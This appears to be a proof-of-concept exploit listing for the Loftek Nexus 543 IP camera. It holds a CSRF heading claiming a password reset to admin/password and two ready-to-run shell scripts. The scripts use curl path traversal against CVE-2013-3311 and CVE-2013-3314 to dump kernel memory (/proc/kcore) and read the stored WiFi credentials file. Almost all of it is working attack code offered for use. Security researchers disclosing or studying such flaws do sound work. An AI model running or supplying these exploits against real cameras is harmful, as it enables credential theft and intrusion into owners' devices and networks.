CSRF: Loftek Nexus 543 CSRF PoC Your password has been reset to admin/password Memory Dump: #!/bin/sh # This script exploits CVE-2013-3311 to retrieve kernel memory from a Loftek Nexus 543 IP camera # The file which is downloaded can be analyzed (strings) to recover passwords and other goodies if [[ "$1x" != "x" && "$2x" != "x" ]]; then curl http://$1/../proc/kcore -o $2 exit fi echo "Usage: $0 Nexus-543-IP output_file" WiFi Creds: #!/bin/sh # This script exploits CVE-2013-3314 to retrieve wifi credentials from a Loftek Nexus 543 IP camera if [ "$1x" != "x" ]; then curl http://$1/../etc/RT2870STA.dat exit fi echo "Usage: $0 Nexus-543-IP"